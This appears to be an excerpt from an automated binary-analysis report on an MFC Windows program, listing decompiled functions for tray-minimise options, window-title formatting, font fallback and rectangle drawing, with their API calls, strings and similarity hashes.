Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #6402MessageSend$#1168#2818#540#6696#800H_prolog
String ID: Column %i$Column Count
API String ID: 2095205342-4111091038
Opcode ID: eeaeeeadde2053d3fdd5942da58ee8f325a02e57de623d56492885186a8dae76
Instruction ID: d8ee95baa711665d91386a6af00822c68d82649f3856d03779249b44c4bfa460
Opcode Fuzzy Hash: eeaeeeadde2053d3fdd5942da58ee8f325a02e57de623d56492885186a8dae76
Instruction Fuzzy Hash: 50217F71A00129EFCF00EF99D842AEEBBB5FF48314F51415AF915B7261C774AA50CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00401BCC, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 61
timeCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00401BCC(void* __ecx) {
				void* _t17;
				intOrPtr* _t19;
				intOrPtr _t20;
				void* _t42;

				_t17 = E004288D4;
				L004269E6();
				_push(__ecx);
				_t40 = __ecx;
				if( *((intOrPtr*)(_t42 + 8)) == 0x65) {
					_push(0x8067);
					_push(_t42 + 8);
					_t19 = _t42 - 0x10;
					_push(_t19);
					L00425FE8();
					L00425FE2();
					_t20 =  *_t19;
					 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
					_push(1);
					_push(_t20);
					_push(0x8071);
					L0042631E();
					_push(_t20);
					L004263A8();
					 *(_t42 - 4) =  *(_t42 - 4) | 0xffffffff;
					L00425DFC();
					_push(1);
					_push("MinimizeToTray");
					_push("Options");
					L00425E3E();
					_t17 = L00401A4B(__ecx, _t20);
				} else {
					if( *((intOrPtr*)(_t42 + 8)) == 0x69) {
						KillTimer( *(__ecx + 0x20), 0x69);
						_push(1);
						E004013D4( *((intOrPtr*)(_t40 + 0x370)));
						L004013E8( *((intOrPtr*)(_t40 + 0x370)));
						_t17 = L004020DB(_t40 + 0x4b4);
					} else {
						L00425FD6();
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t17;
			}

0x0040d3de
0x0040d3e3
0x0040d3e8
0x0040d3ef
0x0040d3f1
0x0040d438
0x0040d43d
0x0040d43e
0x0040d441
0x0040d442
0x0040d449
0x0040d44e
0x0040d450
0x0040d45a
0x0040d45c
0x0040d45d
0x0040d464
0x0040d469
0x0040d46c
0x0040d471
0x0040d478
0x0040d483
0x0040d485
0x0040d48a
0x0040d48f
0x0040d497
0x0040d3f3
0x0040d3f7
0x0040d408
0x0040d41a
0x0040d41c
0x0040d423
0x0040d42e
0x0040d3f9
0x0040d3f9
0x0040d3f9
0x0040d3f7
0x0040d4a1
0x0040d4a9

APIs

_EH_prolog.MSVCRT ref: 0040D3E3
#2379.MFC42 ref: 0040D3F9
KillTimer.USER32(?,00000069), ref: 0040D408
#3811.MFC42(?,00000065,00008067), ref: 0040D442
#2819.MFC42(?,00000065,00008067), ref: 0040D449
#2011.MFC42(00008071,?,00000001,?,00000065,00008067), ref: 0040D464
#6069.MFC42(00000000,00008071,?,00000001,?,00000065,00008067), ref: 0040D46C
#800.MFC42(00000000,00008071,?,00000001,?,00000065,00008067), ref: 0040D478
#3521.MFC42(Options,MinimizeToTray,00000001,00000000,00008071,?,00000001,?,00000065,00008067), ref: 0040D48F

Strings

i, xrefs: 0040D3F3
Options, xrefs: 0040D48A
MinimizeToTray, xrefs: 0040D485

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2011#2379#2819#3521#3811#6069#800H_prologKillTimer
String ID: MinimizeToTray$Options$i
API String ID: 1660297130-1417307684
Opcode ID: c173ea0955a6f708fdff6b37ea79be1ec4a2f4c4b0dbc66f0450a7405c93f225
Instruction ID: ea303efd20e2afe74c4f2ef8869c0a43bd3524d70c86980518ea084f50934c25
Opcode Fuzzy Hash: c173ea0955a6f708fdff6b37ea79be1ec4a2f4c4b0dbc66f0450a7405c93f225
Instruction Fuzzy Hash: FE11D331700714ABDB14FBA1D842BEE7769BF40304F40442FB156BB1D2CBB86A05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401375, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00401375(void* __ecx, void* __eflags) {
				intOrPtr* _t33;
				void* _t39;
				void* _t51;
				void* _t55;

				L004269E6();
				_t33 = _t55 - 0x24;
				_push(_t33);
				L00425FE8();
				_push(0x8067);
				 *((intOrPtr*)(_t55 - 0x20)) =  *_t33;
				_push(_t55 - 0x1c);
				L00425FE2();
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				_push(0x80);
				L00425FB8();
				_push(0x8073);
				 *(_t55 - 4) = 1;
				L00425FB8();
				 *(_t55 - 4) = 2;
				L00425E08();
				_push( *((intOrPtr*)(_t55 - 0x14)));
				 *(_t55 - 4) = 3;
				_push( *((intOrPtr*)(_t55 - 0x18)));
				_push("%s - %s");
				_push(_t55 - 0x10);
				L00425FDC();
				_t39 = L00401A87(__ecx + 0x4c, _t51,  *((intOrPtr*)(_t55 + 8)),  *((intOrPtr*)(_t55 + 0xc)), _t55 - 0x10, _t55 - 0x1c);
				 *(_t55 - 4) = 2;
				L00425DFC();
				 *(_t55 - 4) = 1;
				L00425DFC();
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				L00425DFC();
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return _t39;
			}

0x0040882d
0x00408835
0x0040883b
0x0040883c
0x00408843
0x00408848
0x0040884e
0x00408852
0x00408857
0x0040885b
0x00408863
0x00408868
0x00408870
0x00408874
0x0040887c
0x00408880
0x00408885
0x0040888b
0x0040888f
0x00408892
0x00408897
0x00408898
0x004088b1
0x004088b9
0x004088bd
0x004088c5
0x004088c9
0x004088ce
0x004088d5
0x004088da
0x004088e1
0x004088ea
0x004088f2

APIs

_EH_prolog.MSVCRT ref: 0040882D
#3811.MFC42(?), ref: 0040883C
#2819.MFC42(?,00008067,?), ref: 00408852
#537.MFC42(00000080,?,00008067,?), ref: 00408863
#537.MFC42(00008073,00000080,?,00008067,?), ref: 00408874
#540.MFC42(00008073,00000080,?,00008067,?), ref: 00408880
#2818.MFC42(?,%s - %s,?,?,00008073,00000080,?,00008067,?), ref: 00408898
#800.MFC42(?,?,?,?,?,00008067,?), ref: 004088BD
#800.MFC42(?,?,?,?,?,00008067,?), ref: 004088C9
#800.MFC42(?,?,?,?,?,00008067,?), ref: 004088D5
#800.MFC42(?,?,?,?,?,00008067,?), ref: 004088E1

Strings

%s - %s, xrefs: 00408892

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#537$#2818#2819#3811#540H_prolog
String ID: %s - %s
API String ID: 2936747108-125065292
Opcode ID: 76d1cb395dd15c3c40e5180bf3848f92380f2ec13a9b85fc785703cd04367b82
Instruction ID: 69b086e0f8afa25c62830a0a6104da496704a7e9e7c27f8f589c8e0f3621eccf
Opcode Fuzzy Hash: 76d1cb395dd15c3c40e5180bf3848f92380f2ec13a9b85fc785703cd04367b82
Instruction Fuzzy Hash: 17218071D04169EADF01EBE0D946BEEBB78AF14308F90845EE111731D2DB785B08CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004013B1, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004013B1(void* __ecx, void* __eflags) {
				intOrPtr* _t33;
				void* _t39;
				void* _t51;
				void* _t55;

				L004269E6();
				_t33 = _t55 - 0x24;
				_push(_t33);
				L00425FE8();
				_push(0x8067);
				 *((intOrPtr*)(_t55 - 0x20)) =  *_t33;
				_push(_t55 - 0x1c);
				L00425FE2();
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				_push(0x80);
				L00425FB8();
				_push(0x8052);
				 *(_t55 - 4) = 1;
				L00425FB8();
				 *(_t55 - 4) = 2;
				L00425E08();
				_push( *((intOrPtr*)(_t55 - 0x14)));
				 *(_t55 - 4) = 3;
				_push( *((intOrPtr*)(_t55 - 0x18)));
				_push("%s - %s");
				_push(_t55 - 0x10);
				L00425FDC();
				_t39 = L00401A87(__ecx + 0x4c, _t51,  *((intOrPtr*)(_t55 + 8)),  *((intOrPtr*)(_t55 + 0xc)), _t55 - 0x10, _t55 - 0x1c);
				 *(_t55 - 4) = 2;
				L00425DFC();
				 *(_t55 - 4) = 1;
				L00425DFC();
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				L00425DFC();
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return _t39;
			}

0x00409a55
0x00409a5d
0x00409a63
0x00409a64
0x00409a6b
0x00409a70
0x00409a76
0x00409a7a
0x00409a7f
0x00409a83
0x00409a8b
0x00409a90
0x00409a98
0x00409a9c
0x00409aa4
0x00409aa8
0x00409aad
0x00409ab3
0x00409ab7
0x00409aba
0x00409abf
0x00409ac0
0x00409ad9
0x00409ae1
0x00409ae5
0x00409aed
0x00409af1
0x00409af6
0x00409afd
0x00409b02
0x00409b09
0x00409b12
0x00409b1a

APIs

_EH_prolog.MSVCRT ref: 00409A55
#3811.MFC42(?), ref: 00409A64
#2819.MFC42(?,00008067,?), ref: 00409A7A
#537.MFC42(00000080,?,00008067,?), ref: 00409A8B
#537.MFC42(00008052,00000080,?,00008067,?), ref: 00409A9C
#540.MFC42(00008052,00000080,?,00008067,?), ref: 00409AA8
#2818.MFC42(?,%s - %s,?,?,00008052,00000080,?,00008067,?), ref: 00409AC0
#800.MFC42(?,?,?,?,?,00008067,?), ref: 00409AE5
#800.MFC42(?,?,?,?,?,00008067,?), ref: 00409AF1
#800.MFC42(?,?,?,?,?,00008067,?), ref: 00409AFD
#800.MFC42(?,?,?,?,?,00008067,?), ref: 00409B09

Strings

%s - %s, xrefs: 00409ABA

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#537$#2818#2819#3811#540H_prolog
String ID: %s - %s
API String ID: 2936747108-125065292
Opcode ID: 88c53ac8029c66c358c4dadf0c5607dada60ae69a0ebf183926c080e51f46df9
Instruction ID: 1e68dc2bcc95d28b682038d61f7ac3d27968601a2e49b6f56d8c30d565a5cc29
Opcode Fuzzy Hash: 88c53ac8029c66c358c4dadf0c5607dada60ae69a0ebf183926c080e51f46df9
Instruction Fuzzy Hash: B721A131D00169EECB01EBD0D946BEEBB74AF14308F50845EE011731D2DB785B09CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040EEDE, Relevance: 21.0, APIs: 9, Strings: 3, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040EEDE(intOrPtr __ecx, void* __eflags) {
				int _t19;
				CHAR* _t20;
				intOrPtr _t34;
				void* _t36;

				L004269E6();
				_t34 = __ecx;
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				E00401E6A(__ecx, __eflags);
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				L00425E08();
				 *(__ecx + 0x100) =  *(__ecx + 0x100) & 0x00000000;
				 *(_t36 - 4) = 1;
				 *((intOrPtr*)(__ecx)) = 0x42db90;
				L004264B0();
				 *(_t36 - 4) = 2;
				_push(CreateCompatibleDC(0));
				L004264AA();
				_t19 = EnumFontFamiliesA( *(_t36 - 0x1c), "Tahoma", E004011BD, 0);
				_t20 = "Tahoma";
				if(_t19 != 0) {
					_t20 = "Arial";
				}
				_push(_t20);
				L004261A4();
				L004264A4();
				 *(_t36 - 4) = 1;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x0040eee3
0x0040eeec
0x0040eeef
0x0040eef2
0x0040eef7
0x0040ef03
0x0040ef08
0x0040ef12
0x0040ef16
0x0040ef1c
0x0040ef23
0x0040ef2d
0x0040ef31
0x0040ef45
0x0040ef4d
0x0040ef52
0x0040ef54
0x0040ef54
0x0040ef59
0x0040ef5c
0x0040ef64
0x0040ef6c
0x0040ef70
0x0040ef7c
0x0040ef84

APIs

_EH_prolog.MSVCRT ref: 0040EEE3
#540.MFC42 ref: 0040EF03
#323.MFC42 ref: 0040EF1C
CreateCompatibleDC.GDI32(00000000), ref: 0040EF27
#1640.MFC42(00000000), ref: 0040EF31
EnumFontFamiliesA.GDI32(?,Tahoma,Function_000011BD,00000000), ref: 0040EF45
#860.MFC42(Tahoma), ref: 0040EF5C
#2405.MFC42(Tahoma), ref: 0040EF64
#640.MFC42(Tahoma), ref: 0040EF70

Strings

Tahoma, xrefs: 0040EF4D, 0040EF59
Arial, xrefs: 0040EF54
Tahoma, xrefs: 0040EF3D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1640#2405#323#540#640#860CompatibleCreateEnumFamiliesFontH_prolog
String ID: Arial$Tahoma$Tahoma
API String ID: 757185507-2218066757
Opcode ID: 3f12c983e1715c430670a0dedc9164b02e1f9f029cad12f4d40deca75f622591
Instruction ID: 6c947b9a520b50b3563768d34e2744b865a2c98327646eceb78f0ce88c2ec98b
Opcode Fuzzy Hash: 3f12c983e1715c430670a0dedc9164b02e1f9f029cad12f4d40deca75f622591
Instruction Fuzzy Hash: 2E118231B002649ADB05FBA9E8157EDB7B4AF54309F51406FE541B3292CBBC6A04876D

Uniqueness

Uniqueness Score: -1.00%

Function 0040204A, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0040204A(intOrPtr __ecx) {
				long _t27;
				void* _t38;
				intOrPtr* _t51;
				intOrPtr _t53;
				intOrPtr _t63;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				long long* _t73;

				_t53 = __ecx;
				L004269E6();
				_t73 = _t72 - 0x1c;
				_t51 =  *((intOrPtr*)(_t70 + 0xc));
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t70 - 0x10)) = __ecx;
				 *(_t70 - 0x14) = 0;
				 *(_t70 - 0x18) = 0x42e55c;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				if( *0x4421ac != 7 || L00401F23() != 0) {
					_push(4);
				} else {
					_push(0xf);
				}
				_t27 = GetSysColor();
				_t78 =  *((intOrPtr*)(_t70 + 0x10));
				if( *((intOrPtr*)(_t70 + 0x10)) == 0) {
					_push(_t53);
					 *_t73 =  *0x42e538;
					_t27 = L0040226B(_t78, _t27, _t53);
				}
				_push(CreateSolidBrush(_t27));
				L004264BC();
				_t9 = _t70 - 0x18; // 0x42e55c
				_t63 =  *((intOrPtr*)(_t70 + 8));
				asm("sbb eax, eax");
				FillRect( *(_t63 + 4), _t70 - 0x28,  ~_t9 &  *(_t70 - 0x14));
				L00425FA6();
				if( *0x4421ac >= 2) {
					DrawEdge( *(_t63 + 4), _t70 - 0x28, 2, 0xf);
				}
				if( *((intOrPtr*)(_t70 + 0x14)) != 0) {
					_push(GetSysColor(7));
					_push( *((intOrPtr*)(_t51 + 4)) + 4);
					_t38 =  *_t51 + 5;
					__eflags = _t38;
					_push(_t38);
					_push(_t63);
					E004010AF();
				} else {
					_push(0);
					_push(GetSysColor(7));
					_push( *((intOrPtr*)(_t51 + 4)) + 4);
					_push( *_t51 + 4);
					_push(_t63);
					L00402031();
				}
				 *(_t70 - 0x18) = 0x42c514;
				_t68 = 1;
				 *((intOrPtr*)(_t70 - 4)) = _t68;
				L00425FA6();
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t68;
			}

0x0040204a
0x00417753
0x00417758
0x0041775c
0x00417766
0x00417767
0x00417768
0x00417769
0x0041776c
0x0041776f
0x00417772
0x00417780
0x00417783
0x00417792
0x0041778e
0x0041778e
0x0041778e
0x0041779a
0x0041779c
0x0041779f
0x004177a7
0x004177a9
0x004177ad
0x004177b2
0x004177bc
0x004177c0
0x004177c5
0x004177c8
0x004177cd
0x004177da
0x004177e3
0x004177ef
0x004177fc
0x004177fc
0x00417806
0x0041782b
0x00417835
0x00417838
0x00417838
0x0041783b
0x0041783c
0x0041783d
0x00417808
0x00417808
0x0041780e
0x00417818
0x0041781e
0x0041781f
0x00417820
0x00417820
0x00417842
0x0041784e
0x0041784f
0x00417852
0x0041785f
0x00417867

APIs

_EH_prolog.MSVCRT ref: 00417753
GetSysColor.USER32(00000004), ref: 0041779A
CreateSolidBrush.GDI32(00000000), ref: 004177B6
#1641.MFC42(00000000), ref: 004177C0
FillRect.USER32 ref: 004177DA
#2414.MFC42 ref: 004177E3
DrawEdge.USER32(?,?,00000002,0000000F), ref: 004177FC
GetSysColor.USER32(00000007), ref: 0041780C
GetSysColor.USER32(00000007), ref: 00417829
#2414.MFC42 ref: 00417852

Strings

\B, xrefs: 004177BD

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$#2414$#1641BrushCreateDrawEdgeFillH_prologRectSolid
String ID: \B
API String ID: 712680347-2993081821
Opcode ID: c2a5e10feec47e96a66a1c6cc2ee7b3e60e741085be4b5bdab70a3e552ce0b3d
Instruction ID: 63e30376ed9480428fb5f320c9fd3d45bb6a9e70846b1f6a9248cd0da315c4cf
Opcode Fuzzy Hash: c2a5e10feec47e96a66a1c6cc2ee7b3e60e741085be4b5bdab70a3e552ce0b3d
Instruction Fuzzy Hash: 54316071A04115EBDB00EF95DD46BEFBBB8EF45314F40402AF505E6181D778A984CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00410CA3, Relevance: 18.2, APIs: 12, Instructions: 160
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00410CA3(void* __ecx) {
				signed int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				int _v40;
				long _v44;
				struct tagRECT _v60;
				struct tagRECT _v76;
				struct tagRECT _v92;
				void* _t67;
				intOrPtr _t68;
				void* _t79;
				int _t85;
				struct HDC__* _t89;
				void* _t109;
				intOrPtr* _t115;
				signed int _t117;
				intOrPtr _t122;
				struct HDC__* _t130;

				_t109 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xe0)) == 0) {
					_t68 =  *((intOrPtr*)(__ecx + 0xe4));
					if(_t68 == 0xe81b || _t68 == 0xe81e) {
						_v8 = 1;
					} else {
						_v8 = _v8 & 0x00000000;
					}
					GetWindowRect( *(_t109 + 0x20),  &_v92);
					GetWindowRect( *( *((intOrPtr*)(_t109 + 0x74)) + 0x20),  &_v60);
					GetWindowRect( *( *((intOrPtr*)(_t109 + 0x70)) + 0x20),  &_v76);
					_push( &_v28);
					_push( *((intOrPtr*)(_t109 + 0x80)));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004018AC(_t109);
					_t79 = L004020FE(_t109);
					if(_t79 == 0) {
						if(_v8 == _t79) {
							_v44 = _v28.left;
							_v40 = _v60.top + 1;
							_v36 = _v28.right;
							_v32 = _v60.bottom - 1;
						} else {
							_v44 = _v60.left + 1;
							_v40 = _v28.top;
							_v36 = _v60.right - 1;
							_v32 = _v28.bottom;
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					OffsetRect( &_v28,  ~(_v76.left),  ~(_v76.top));
					_t115 = _t109 + 0x84;
					if(_v8 == 0) {
						_t115 = _t109 + 0x8c;
					}
					_t85 =  *_t115 -  *((intOrPtr*)(_t109 + 0xc4));
					_t122 =  *((intOrPtr*)(_t109 + 0xe4));
					_t117 =  *((intOrPtr*)(_t115 + 4)) -  *((intOrPtr*)(_t109 + 0xc8));
					_v8 = _t117;
					if(_t122 != 0xe81c ||  *((intOrPtr*)(_t109 + 0x80)) != 0xc) {
						if(_t122 != 0xe81d ||  *((intOrPtr*)(_t109 + 0x80)) == 0xf) {
							if(_t122 != 0xe81b ||  *((intOrPtr*)(_t109 + 0x80)) != 0xa) {
								if(_t122 != 0xe81e ||  *((intOrPtr*)(_t109 + 0x80)) == 0xb) {
									goto L21;
								} else {
									goto L20;
								}
							} else {
								goto L20;
							}
						} else {
							goto L20;
						}
					} else {
						L20:
						_t85 =  ~_t85;
						_v8 =  ~_t117;
						L21:
						OffsetRect( &_v28, _t85, _v8);
						_t89 = GetDCEx( *( *((intOrPtr*)(_t109 + 0x70)) + 0x20), 0, 0x403);
						_push(_t89);
						L00425FD0();
						_t130 = _t89;
						L00426576();
						_push(_t89);
						L00426570();
						PatBlt( *(_t130 + 4), _v28.left, _v28.top, _v28.right - _v28, _v28.bottom - _v28.top, 0x5a0049);
						_push(_t89);
						L00426570();
						return ReleaseDC( *( *((intOrPtr*)(_t109 + 0x70)) + 0x20),  *(_t130 + 4));
					}
				}
				return _t67;
			}

0x00410caa
0x00410cb5
0x00410cbb
0x00410cc6
0x00410cd5
0x00410ccf
0x00410ccf
0x00410ccf
0x00410ce9
0x00410cf5
0x00410d01
0x00410d09
0x00410d0c
0x00410d17
0x00410d18
0x00410d19
0x00410d1a
0x00410d1b
0x00410d22
0x00410d29
0x00410d2e
0x00410d55
0x00410d5c
0x00410d62
0x00410d69
0x00410d30
0x00410d37
0x00410d3d
0x00410d44
0x00410d4a
0x00410d4a
0x00410d6f
0x00410d70
0x00410d71
0x00410d72
0x00410d72
0x00410d89
0x00410d8f
0x00410d95
0x00410d97
0x00410d97
0x00410dae
0x00410db0
0x00410db6
0x00410dbe
0x00410dc1
0x00410dd2
0x00410de3
0x00410df4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00410dff
0x00410dff
0x00410dff
0x00410e03
0x00410e06
0x00410e0e
0x00410e1d
0x00410e23
0x00410e24
0x00410e29
0x00410e2b
0x00410e30
0x00410e33
0x00410e56
0x00410e5c
0x00410e5f
0x00000000
0x00410e6d
0x00410dc1
0x00410e77

APIs

GetWindowRect.USER32 ref: 00410CE9
GetWindowRect.USER32 ref: 00410CF5
GetWindowRect.USER32 ref: 00410D01
OffsetRect.USER32(?,?,?), ref: 00410D89
OffsetRect.USER32(?,00000000,00000000), ref: 00410E0E
GetDCEx.USER32(?,00000000,00000403), ref: 00410E1D
#2859.MFC42(00000000), ref: 00410E24
#3220.MFC42(00000000), ref: 00410E2B
#5787.MFC42(00000000,00000000), ref: 00410E33
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00410E56
#5787.MFC42(00000000), ref: 00410E5F
ReleaseDC.USER32 ref: 00410E6D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$#5787Offset$#2859#3220Release
String ID:
API String ID: 3747972913-0
